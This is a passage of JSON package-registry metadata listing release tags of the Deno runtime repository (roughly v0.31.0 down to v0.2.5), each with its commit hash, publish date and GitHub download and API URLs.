.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url"